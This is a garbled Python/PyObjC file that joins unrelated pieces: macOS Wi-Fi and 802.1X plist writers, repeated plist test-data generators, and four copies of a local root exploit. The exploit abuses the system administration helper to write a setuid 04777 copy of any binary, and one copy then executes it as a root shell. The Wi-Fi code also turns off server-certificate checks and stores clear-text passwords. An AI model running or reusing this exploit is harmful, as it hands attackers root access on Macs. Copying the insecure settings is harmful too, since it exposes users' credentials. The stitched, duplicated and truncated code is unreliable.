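def createRecentNetwork(networkDict):
    """Append a RecentNetworks entry for the Wi-Fi port to the AirPort plist.

    Reads the 'ssid', 'sect', 'guid' and 'keyc' keys of networkDict, adds the
    entry under the port name returned by getPlatformPortName(), writes the
    plist back atomically and then sets the file's owner to uid 0 / gid 80.

    Raises:
        KeyError: if networkDict lacks one of the keys listed above.
    """
    path = '/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist'
    # Set to root as the owner for good measure
    uid = 0
    gid = 80
    if os.path.exists(path):
        plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path)
    else:
        plist = NSMutableDictionary.alloc().init()
    port = getPlatformPortName()
    # Check for non-existent keys
    if port not in plist.keys():
        plist[port] = {}
    # Make sure the Array is there
    if 'RecentNetworks' not in plist[port].keys():
        plist[port]['RecentNetworks'] = []
    entry = {
        'SSID_STR': networkDict['ssid'],
        'SecurityType': networkDict['sect'],
        'Unique Network ID': networkDict['guid'],
        'Unique Password ID': networkDict['keyc'],
    }
    # NOTE(review): containers nested inside a plist loaded from disk are
    # presumably immutable, in which case this append fails when the array
    # already existed in the file; confirm on a machine with an existing entry.
    plist[port]['RecentNetworks'].append(entry)
    plist.writeToFile_atomically_(path, True)
    try:
        os.chown(path, uid, gid)
    except OSError as err:
        # Only OS-level failures are best-effort; the old bare except also hid
        # programming errors and reported every failure as a missing path.
        print('Could not set ownership on %s: %s' % (path, err))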
def genSnowProfile(networkDict):
    """Write an 802.1X user-profile plist to a fixed /tmp path and return it.

    Reads the 'eapt', 'user', 'keyc' and 'ssid' keys of networkDict. The
    password itself is not written; the profile refers to a keychain item by
    the 'keyc' identifier.
    """
    # EAPClientConfiguration
    eap_config = {
        'AcceptEAPTypes': [networkDict['eapt']],
        'UserName': networkDict['user'],
        'UserPasswordKeychainItemID': networkDict['keyc'],
    }
    # UserProfiles
    profile = {
        'ConnectByDefault': True,
        'EAPClientConfiguration': eap_config,
        'UniqueIdentifier': networkDict['keyc'],
        'UserDefinedName': '%s-%s' % (networkDict['ssid'], networkDict['user']),
        'Wireless Network': networkDict['ssid'],
    }
    # 8021X
    plist = NSMutableDictionary.alloc().init()
    plist['8021X'] = {'UserProfiles': [profile]}
    # NOTE(review): the profile (user name, keychain item id) is printed on
    # every call and written to a fixed, predictable name under /tmp.
    print(plist)
    exportFile = '/tmp/.importme.networkconnect'
    plist.writeToFile_atomically_(exportFile, True)
    return exportFile
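def createKnownNetwork(networkDict):
    """Write a KnownNetworks entry for one network into the AirPort plist.

    Reads the 'guid', 'ssid', 'chan', 'sect', 'type' and 'keyc' keys of
    networkDict, stores the entry under KnownNetworks[guid], writes the plist
    back atomically and then sets the file's owner to uid 0 / gid 80.

    The listing this was recovered from had lost its indentation; the
    placement of the KnownNetworks reset and of the timestamp is a best
    reading and should be checked against the original file.
    """
    print('Creating KnownNetworks entry')
    # There were some MacBook Airs that shipped with 10.5
    path = '/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist'
    # Set to root as the owner for good measure
    uid = 0
    gid = 80
    if os.path.exists(path):
        plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path)
    else:
        plist = NSMutableDictionary.alloc().init()
    # NOTE(review): as read here this replaces every known network already in
    # the file; if the reset belonged to the else branch above, an existing
    # file without the key raises KeyError instead. Confirm the intent.
    plist['KnownNetworks'] = {}
    guid = networkDict['guid']
    entry = {
        'SSID_STR': networkDict['ssid'],
        'Remembered channels': [networkDict['chan']],
        'SecurityType': networkDict['sect'],
    }
    # If we are adding a non WPA2 Enterprise network add the keychain item
    if networkDict['type'] == 'WPA2':
        entry['Unique Password ID'] = networkDict['keyc']
    entry['_timeStamp'] = NSDate.date()
    plist['KnownNetworks'][guid] = entry
    plist.writeToFile_atomically_(path, True)
    try:
        os.chown(path, uid, gid)
    except OSError as err:
        # Only OS-level failures are best-effort; the old bare except also hid
        # programming errors and reported every failure as a missing path.
        print('Could not set ownership on %s: %s' % (path, err))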
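def genLionProfile(networkDict=None):
    """Build a Wi-Fi configuration profile and write it under /tmp.

    Reads the 'eapt', 'iath', 'user', 'pass', 'ssid', 'mdmh', 'puid', 'suid',
    'orgn' and 'scop' keys of networkDict and returns the path of the
    .mobileconfig file that was written.

    The profile carries the account password in clear text
    (EAPClientConfiguration['UserPassword']), so the file is created with
    owner-only permissions.

    Raises:
        KeyError: if networkDict lacks one of the keys listed above.
    """
    import os

    # A shared mutable default served no purpose: an empty dict fails on the
    # first key lookup either way.
    if networkDict is None:
        networkDict = {}
    plist = NSMutableDictionary.alloc().init()
    # EAPClientConfiguration
    # NOTE(review): no trusted server names are pinned; confirm that server
    # trust is established elsewhere before this profile is deployed.
    tlsTrustedServerNames = []
    EAPClientConfiguration = {
        'AcceptEAPTypes': [networkDict['eapt']],
        'TTLSInnerAuthentication': networkDict['iath'],
        'UserName': networkDict['user'],
        'UserPassword': networkDict['pass'],
        'tlsTrustedServerNames': tlsTrustedServerNames,
    }
    # PayloadContent
    _PayloadContent = {
        'AuthenticationMethod': '',
        'EAPClientConfiguration': EAPClientConfiguration,
        'EncryptionType': 'WPA',
        'HIDDEN_NETWORK': False,
        'Interface': 'BuiltInWireless',
        'PayloadDisplayName': '%s-%s' % (networkDict['ssid'], networkDict['user']),
        'PayloadEnabled': True,
        'PayloadIdentifier': '%s.%s.alacarte.interfaces.%s' % (
            networkDict['mdmh'], networkDict['puid'], networkDict['suid']),
        'PayloadType': 'com.apple.wifi.managed',
        'PayloadUUID': networkDict['suid'],
        'PayloadVersion': 1,
        'SSID_STR': networkDict['ssid'],
    }
    plist['PayloadContent'] = [_PayloadContent]
    plist['PayloadDisplayName'] = networkDict['orgn']
    plist['PayloadIdentifier'] = '%s.%s.alacarte' % (networkDict['mdmh'], networkDict['puid'])
    plist['PayloadOrganization'] = networkDict['orgn']
    plist['PayloadRemovalDisallowed'] = False
    plist['PayloadScope'] = networkDict['scop']
    plist['PayloadType'] = 'Configuration'
    plist['PayloadUUID'] = networkDict['puid']
    plist['PayloadVersion'] = 1
    # Show the plist on debug
    # NOTE(review): this prints the clear-text password to stdout.
    if debugEnabled:
        print(plist)
    exportFile = '/tmp/.%s-%s.mobileconfig' % (networkDict['user'], networkDict['ssid'])
    # Keep the credential-bearing file unreadable to other local users: tighten
    # the umask for the write, then pin the mode in case it was not honoured.
    previous_umask = os.umask(0o077)
    try:
        written = plist.writeToFile_atomically_(exportFile, True)
    finally:
        os.umask(previous_umask)
    if written:
        os.chmod(exportFile, 0o600)
    return exportFile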
def verify(cls, args):
    """Ask the system administration helper to create a setuid copy of a file.

    Reads args['options']['target'] (source file) and
    args['options']['dest_binary'] (destination, resolved with
    os.path.realpath). Sets args['success'] and
    args['poc_ret']['dest_binary'] before returning args.

    Raises:
        Exception: if the source file does not exist.
    """
    source_binary = args['options']['target']
    dest_binary = os.path.realpath(args['options']['dest_binary'])
    if not os.path.exists(source_binary):
        raise Exception("file does not exist!")
    pool = NSAutoreleasePool.alloc().init()
    attr = NSMutableDictionary.alloc().init()
    # Mode 04777: setuid bit plus rwx for everyone. A newly created file with
    # this mode is the artefact that file-integrity monitoring should alert on.
    attr.setValue_forKey_(04777, NSFilePosixPermissions)
    data = NSData.alloc().initWithContentsOfFile_(source_binary)
    print "[*] will write file", dest_binary
    # Two code paths, chosen by cls.use_old_api(); both end in the same
    # createFileWithContents call on an object handed out by the framework.
    if cls.use_old_api():
        adm_lib = cls.load_lib("/Admin.framework/Admin")
        Authenticator = objc.lookUpClass("Authenticator")
        ToolLiaison = objc.lookUpClass("ToolLiaison")
        SFAuthorization = objc.lookUpClass("SFAuthorization")
        authent = Authenticator.sharedAuthenticator()
        authref = SFAuthorization.authorization()
        # authref with value nil is not accepted on OS X <= 10.8
        authent.authenticateUsingAuthorizationSync_(authref)
        st = ToolLiaison.sharedToolLiaison()
        tool = st.tool()
        tool.createFileWithContents_path_attributes_(
            data, dest_binary, attr)
    else:
        adm_lib = cls.load_lib(
            "/SystemAdministration.framework/SystemAdministration")
        WriteConfigClient = objc.lookUpClass("WriteConfigClient")
        client = WriteConfigClient.sharedClient()
        # No authorization reference is supplied on this path.
        client.authenticateUsingAuthorizationSync_(None)
        tool = client.remoteProxy()
        tool.createFileWithContents_path_attributes_(
            data, dest_binary, attr, 0)
    print "[+] Done!"
    del pool
    # NOTE(review): success is reported without checking that dest_binary was
    # created or which mode it received, so a patched host would presumably
    # still be reported as affected; confirm before relying on this result.
    args['success'] = True
    args['poc_ret']['dest_binary'] = dest_binary
    return args
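def createEAPBinding(path,uid,gid,networkDict):
    """Bind an 802.1X profile to a network under the AirPort MAC address.

    Stores one item (the 'keyc' and 'ssid' keys of networkDict) in the plist
    at path, keyed by the value getAirportMac() returns, writes the plist back
    atomically and then sets the file's owner to uid / gid.

    The listing this was recovered from had lost its indentation; the
    placement of the per-MAC list reset is a best reading.
    """
    macAddress = getAirportMac()
    if os.path.exists(path):
        plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path)
    else:
        plist = NSMutableDictionary.alloc().init()
    # NOTE(review): as read here this drops any bindings already stored for
    # this MAC address; if the reset belonged to the else branch above, an
    # existing file without the key raises KeyError instead. Confirm.
    plist[macAddress] = []
    item = {
        'UniqueIdentifier': networkDict['keyc'],
        'Wireless Network': networkDict['ssid'],
    }
    plist[macAddress].append(item)
    plist.writeToFile_atomically_(path, True)
    try:
        os.chown(path, uid, gid)
    except OSError as err:
        # Only OS-level failures are best-effort; the old bare except also hid
        # programming errors and reported every failure as a missing path.
        print('Could not set ownership on %s: %s' % (path, err))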
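def createEAPProfile(path,uid,gid,networkDict):
    """Write an 802.1X profile entry into the plist at path.

    Reads the 'eapt', 'iath', 'user', 'keyc', 'type' and 'ssid' keys of
    networkDict, appends the profile to plist['Profiles'], writes the plist
    back atomically and then sets the file's owner to uid / gid. The
    'Wireless Security' keys are left out when osVersion['minor'] equals LEOP.

    The listing this was recovered from had lost its indentation; the
    placement of the Profiles reset is a best reading.
    """
    if os.path.exists(path):
        plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path)
    else:
        plist = NSMutableDictionary.alloc().init()
    # NOTE(review): as read here this discards the profiles already in the
    # file, which contradicts the "merge" comment below; if the reset belonged
    # to the else branch, an existing file without the key raises KeyError.
    plist['Profiles'] = []
    include_security = osVersion['minor'] != LEOP
    # Top Level EAPClientConfiguration keys
    EAPClientConfiguration = {
        'AcceptEAPTypes': [networkDict['eapt']],
        'Description': 'Automatic',
        'EAPFASTProvisionPAC': True,
        'EAPFASTUsePAC': True,
        # NOTE(review): server certificate validation is switched off, so the
        # client does not authenticate the network before sending the inner
        # credentials. Enable it once the RADIUS trust anchor is deployed.
        'TLSVerifyServerCertificate': False,
        'TTLSInnerAuthentication': networkDict['iath'],
        'UserName': networkDict['user'],
        'UserPasswordKeychainItemID': networkDict['keyc'],
    }
    if include_security:
        EAPClientConfiguration['Wireless Security'] = networkDict['type']
    # Top Level item keys
    profile = {
        'EAPClientConfiguration': EAPClientConfiguration,
        'UniqueIdentifier': networkDict['keyc'],
        'UserDefinedName': 'WPA: %s' % networkDict['ssid'],
    }
    if include_security:
        profile['Wireless Security'] = networkDict['type']
    # Merge the data with current plist
    plist['Profiles'].append(profile)
    plist.writeToFile_atomically_(path, True)
    try:
        os.chown(path, uid, gid)
    except OSError as err:
        # Only OS-level failures are best-effort; the old bare except also hid
        # programming errors and reported every failure as a missing path.
        print('Could not set ownership on %s: %s' % (path, err))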
def verify(cls, args):
    """Ask the system administration helper to create a setuid copy of a file.

    Reads args['options']['target'] (source file) and
    args['options']['dest_binary'] (destination, resolved with
    os.path.realpath). Sets args['success'] and
    args['poc_ret']['dest_binary'] before returning args.

    Raises:
        Exception: if the source file does not exist.
    """
    source_binary = args['options']['target']
    dest_binary = os.path.realpath(args['options']['dest_binary'])
    if not os.path.exists(source_binary):
        raise Exception("file does not exist!")
    pool = NSAutoreleasePool.alloc().init()
    attr = NSMutableDictionary.alloc().init()
    # Mode 04777: setuid bit plus rwx for everyone. A newly created file with
    # this mode is the artefact that file-integrity monitoring should alert on.
    attr.setValue_forKey_(04777, NSFilePosixPermissions)
    data = NSData.alloc().initWithContentsOfFile_(source_binary)
    print "[*] will write file", dest_binary
    # Two code paths, chosen by cls.use_old_api(); both end in the same
    # createFileWithContents call on an object handed out by the framework.
    if cls.use_old_api():
        adm_lib = cls.load_lib("/Admin.framework/Admin")
        Authenticator = objc.lookUpClass("Authenticator")
        ToolLiaison = objc.lookUpClass("ToolLiaison")
        SFAuthorization = objc.lookUpClass("SFAuthorization")
        authent = Authenticator.sharedAuthenticator()
        authref = SFAuthorization.authorization()
        # authref with value nil is not accepted on OS X <= 10.8
        authent.authenticateUsingAuthorizationSync_(authref)
        st = ToolLiaison.sharedToolLiaison()
        tool = st.tool()
        tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
    else:
        adm_lib = cls.load_lib("/SystemAdministration.framework/SystemAdministration")
        WriteConfigClient = objc.lookUpClass("WriteConfigClient")
        client = WriteConfigClient.sharedClient()
        # No authorization reference is supplied on this path.
        client.authenticateUsingAuthorizationSync_(None)
        tool = client.remoteProxy()
        tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
    print "[+] Done!"
    del pool
    # NOTE(review): success is reported without checking that dest_binary was
    # created or which mode it received, so a patched host would presumably
    # still be reported as affected; confirm before relying on this result.
    args['success'] = True
    args['poc_ret']['dest_binary'] = dest_binary
    return args
def main():
    """Print a TESTDATA dict literal with one serialized plist per format.

    Builds a fixed property list, serializes it once for every
    (name, format) pair in FORMATS and prints each result base64-encoded.
    """
    def ns_array(*items):
        # Fresh NSMutableArray holding the given items in order.
        arr = NSMutableArray.alloc().init()
        for item in items:
            arr.append(item)
        return arr

    gunk = b'<lots of binary gunk>\x00\x01\x02\x03' * 10
    utc = datetime.timezone(datetime.timedelta(0))
    seconds = datetime.datetime(2004, 10, 26, 10, 33, 33, tzinfo=utc).timestamp()

    # Note: pl is an OrderedDict to control the order
    # of keys, and hence have some control on the structure
    # of the output file.
    # New keys should be added in alphabetical order.
    pl = OrderedDict()
    pl[nsstr('aBigInt')] = 2 ** 63 - 44
    pl[nsstr('aDate')] = NSDate.dateWithTimeIntervalSince1970_(seconds)

    deeper = OrderedDict()
    deeper[nsstr('a')] = 17
    deeper[nsstr('b')] = 32.5
    deeper[nsstr('c')] = ns_array(1, 2, nsstr('text'))

    inner = OrderedDict()
    inner[nsstr('aFalseValue')] = False
    inner[nsstr('aTrueValue')] = True
    inner[nsstr('aUnicodeValue')] = "M\xe4ssig, Ma\xdf"
    inner[nsstr('anotherString')] = "<hello & 'hi' there!>"
    inner[nsstr('deeperDict')] = deeper
    pl[nsstr('aDict')] = inner

    pl[nsstr('aFloat')] = 0.5
    pl[nsstr('aList')] = ns_array(
        nsstr('A'), nsstr('B'), 12, 32.5, ns_array(1, 2, 3))
    pl[nsstr('aNegativeBigInt')] = -80000000000
    pl[nsstr('aNegativeInt')] = -5
    pl[nsstr('aString')] = nsstr('Doodah')
    pl[nsstr('anEmptyDict')] = NSMutableDictionary.alloc().init()
    pl[nsstr('anEmptyList')] = NSMutableArray.alloc().init()
    pl[nsstr('anInt')] = 728
    pl[nsstr('nestedData')] = ns_array(gunk)
    pl[nsstr('someData')] = b'<binary gunk>'
    pl[nsstr('someMoreData')] = gunk
    pl[nsstr('\xc5benraa')] = nsstr("That was a unicode key.")

    print("TESTDATA={")
    for fmt_name, fmt_key in FORMATS:
        serialize = NSPropertyListSerialization.dataWithPropertyList_format_options_error_
        data, error = serialize(pl, fmt_key, 0, None)
        if data is None:
            print("Cannot serialize", fmt_name, error)
            continue
        # Drop the trailing newline the encoder leaves behind.
        encoded = _encode_base64(bytes(data)).decode('ascii')[:-1]
        print(" %s: binascii.a2b_base64(b'''\n %s''')," % (fmt_name, encoded))
    print("}")
    print()
# Command-line form of the privileged file-write check: takes a source file
# and a destination path and prepares a request for a setuid (04777) copy.
# The listing is cut off inside the old-API branch, so the call that performs
# the write is not shown here.
args = sys.argv
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)
source_binary = args[1]
dest_binary = os.path.realpath(args[2])
if not os.path.exists(source_binary):
    raise Exception("file does not exist!")
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
# Mode 04777: setuid bit plus rwx for everyone. A newly created file with this
# mode is the artefact that file-integrity monitoring should alert on.
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
print "will write file", dest_binary
if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")
    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()
    # authref with value nil is not accepted on OS X <= 10.8
def main():
    """Print a TESTDATA dict literal with one serialized plist per format.

    Builds a fixed property list (including an unsigned 64-bit value stored as
    an NSNumber), serializes it once for every (name, format) pair in FORMATS
    and prints each result base64-encoded.
    """
    def ns_array(*items):
        # Fresh NSMutableArray holding the given items in order.
        arr = NSMutableArray.alloc().init()
        for item in items:
            arr.append(item)
        return arr

    gunk = b'<lots of binary gunk>\x00\x01\x02\x03' * 10
    utc = datetime.timezone(datetime.timedelta(0))
    seconds = datetime.datetime(2004, 10, 26, 10, 33, 33, tzinfo=utc).timestamp()

    # Note: pl is an OrderedDict to control the order
    # of keys, and hence have some control on the structure
    # of the output file.
    # New keys should be added in alphabetical order.
    pl = OrderedDict()
    pl[nsstr('aBigInt')] = 2 ** 63 - 44
    pl[nsstr('aBigInt2')] = NSNumber.numberWithUnsignedLongLong_(2 ** 63 + 44)
    pl[nsstr('aDate')] = NSDate.dateWithTimeIntervalSince1970_(seconds)

    deeper = OrderedDict()
    deeper[nsstr('a')] = 17
    deeper[nsstr('b')] = 32.5
    deeper[nsstr('c')] = ns_array(1, 2, nsstr('text'))

    inner = OrderedDict()
    inner[nsstr('aFalseValue')] = False
    inner[nsstr('aTrueValue')] = True
    inner[nsstr('aUnicodeValue')] = "M\xe4ssig, Ma\xdf"
    inner[nsstr('anotherString')] = "<hello & 'hi' there!>"
    inner[nsstr('deeperDict')] = deeper
    pl[nsstr('aDict')] = inner

    pl[nsstr('aFloat')] = 0.5
    pl[nsstr('aList')] = ns_array(
        nsstr('A'), nsstr('B'), 12, 32.5, ns_array(1, 2, 3))
    pl[nsstr('aNegativeBigInt')] = -80000000000
    pl[nsstr('aNegativeInt')] = -5
    pl[nsstr('aString')] = nsstr('Doodah')
    pl[nsstr('anEmptyDict')] = NSMutableDictionary.alloc().init()
    pl[nsstr('anEmptyList')] = NSMutableArray.alloc().init()
    pl[nsstr('anInt')] = 728
    pl[nsstr('nestedData')] = ns_array(gunk)
    pl[nsstr('someData')] = b'<binary gunk>'
    pl[nsstr('someMoreData')] = gunk
    pl[nsstr('\xc5benraa')] = nsstr("That was a unicode key.")

    print("TESTDATA={")
    for fmt_name, fmt_key in FORMATS:
        serialize = NSPropertyListSerialization.dataWithPropertyList_format_options_error_
        data, error = serialize(pl, fmt_key, 0, None)
        if data is None:
            print("Cannot serialize", fmt_name, error)
            continue
        # Drop the trailing newline the encoder leaves behind.
        encoded = _encode_base64(bytes(data)).decode('ascii')[:-1]
        print(" %s: binascii.a2b_base64(b'''\n %s''')," % (fmt_name, encoded))
    print("}")
    print()
def run(self):
    """Request a setuid copy of src_file at des_file, then execute the copy.

    Reads the "src_file" and "des_file" options (element [1] of each option
    value). Returns early, after printing an error, when either is missing,
    when the source does not exist, or when the destination already exists.
    OSError is reported on stdout and re-raised.
    """
    try:
        source_binary = self.options.get("src_file")[1]
        dest_binary = self.options.get("des_file")[1]
        if source_binary == None \
                or source_binary == "" \
                or dest_binary == None \
                or dest_binary == "":
            self.print_error(
                "It's mandatory to specify a source file and a destination file!!"
            )
            return
        if not os.path.exists(source_binary):
            self.print_error("File does not exist!")
            return
        if os.path.exists(dest_binary):
            self.print_error(
                "Destination file already exists. Use another name or remove/rename the original file!"
            )
            return
        pool = NSAutoreleasePool.alloc().init()
        attr = NSMutableDictionary.alloc().init()
        # Mode 04777: setuid bit plus rwx for everyone. A newly created file
        # with this mode is the artefact file-integrity monitoring should
        # alert on.
        attr.setValue_forKey_(0o04777, NSFilePosixPermissions)
        data = NSData.alloc().initWithContentsOfFile_(source_binary)
        self.print_info("will write file " + dest_binary)
        # Two code paths, chosen by self.use_old_api(); both end in the same
        # createFileWithContents call on an object handed out by the framework.
        if self.use_old_api():
            adm_lib = self.load_lib("/Admin.framework/Admin")
            Authenticator = objc.lookUpClass("Authenticator")
            ToolLiaison = objc.lookUpClass("ToolLiaison")
            SFAuthorization = objc.lookUpClass("SFAuthorization")
            authent = Authenticator.sharedAuthenticator()
            authref = SFAuthorization.authorization()
            # authref with value nil is not accepted on OS X <= 10.8
            authent.authenticateUsingAuthorizationSync_(authref)
            st = ToolLiaison.sharedToolLiaison()
            tool = st.tool()
            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr)
        else:
            adm_lib = self.load_lib(
                "/SystemAdministration.framework/SystemAdministration")
            WriteConfigClient = objc.lookUpClass("WriteConfigClient")
            client = WriteConfigClient.sharedClient()
            # No authorization reference is supplied on this path.
            client.authenticateUsingAuthorizationSync_(None)
            tool = client.remoteProxy()
            tool.createFileWithContents_path_attributes_(
                data, dest_binary, attr, 0)
        self.print_ok("Done!")
        del pool
        # NOTE(review): this loop has no timeout; if the helper refuses the
        # request the file never appears and the module polls forever.
        while not os.path.exists(dest_binary):
            self.print_info("Waiting file creation...")
            time.sleep(1)
        self.print_ok("Returning root whell at: " + dest_binary)
        subprocess.call(dest_binary)
    except OSError as e:
        # NOTE(review): os.errno is presumably unavailable on newer Python 3
        # releases, and the "iSelect" text looks copied from another module.
        # The placement of the bare raise is a best reading of a listing that
        # had lost its indentation.
        if e.errno == os.errno.ENOENT:
            print("Sorry, iSelect binary - Not found!")
        else:
            print("Error executing exploit")
        raise
def main():
    """Print a TESTDATA dict literal with one serialized plist per format.

    Builds a fixed property list, serializes it once for every
    (name, format) pair in FORMATS and prints each result base64-encoded.
    """
    def ns_array(*items):
        # Fresh NSMutableArray holding the given items in order.
        arr = NSMutableArray.alloc().init()
        for item in items:
            arr.append(item)
        return arr

    gunk = b'<lots of binary gunk>\x00\x01\x02\x03' * 10
    utc = datetime.timezone(datetime.timedelta(0))
    seconds = datetime.datetime(2004, 10, 26, 10, 33, 33, tzinfo=utc).timestamp()

    # Insertion order of pl decides the key order in the output.
    pl = OrderedDict()
    pl[nsstr('aDate')] = NSDate.dateWithTimeIntervalSince1970_(seconds)

    deeper = OrderedDict()
    deeper[nsstr('a')] = 17
    deeper[nsstr('b')] = 32.5
    deeper[nsstr('c')] = ns_array(1, 2, nsstr('text'))

    inner = OrderedDict()
    inner[nsstr('aFalseValue')] = False
    inner[nsstr('aTrueValue')] = True
    inner[nsstr('aUnicodeValue')] = "M\xe4ssig, Ma\xdf"
    inner[nsstr('anotherString')] = "<hello & 'hi' there!>"
    inner[nsstr('deeperDict')] = deeper
    pl[nsstr('aDict')] = inner

    pl[nsstr('aFloat')] = 0.5
    pl[nsstr('aList')] = ns_array(
        nsstr('A'), nsstr('B'), 12, 32.5, ns_array(1, 2, 3))
    pl[nsstr('aString')] = nsstr('Doodah')
    pl[nsstr('anEmptyDict')] = NSMutableDictionary.alloc().init()
    pl[nsstr('anEmptyList')] = NSMutableArray.alloc().init()
    pl[nsstr('anInt')] = 728
    pl[nsstr('nestedData')] = ns_array(gunk)
    pl[nsstr('someData')] = b'<binary gunk>'
    pl[nsstr('someMoreData')] = gunk
    pl[nsstr('\xc5benraa')] = nsstr("That was a unicode key.")

    print("TESTDATA={")
    for fmt_name, fmt_key in FORMATS:
        serialize = NSPropertyListSerialization.dataWithPropertyList_format_options_error_
        data, error = serialize(pl, fmt_key, 0, None)
        if data is None:
            print("Cannot serialize", fmt_name, error)
            continue
        # Drop the trailing newline the encoder leaves behind.
        encoded = _encode_base64(bytes(data)).decode('ascii')[:-1]
        print(" %s: binascii.a2b_base64(b'''\n %s''')," % (fmt_name, encoded))
    print("}")
    print()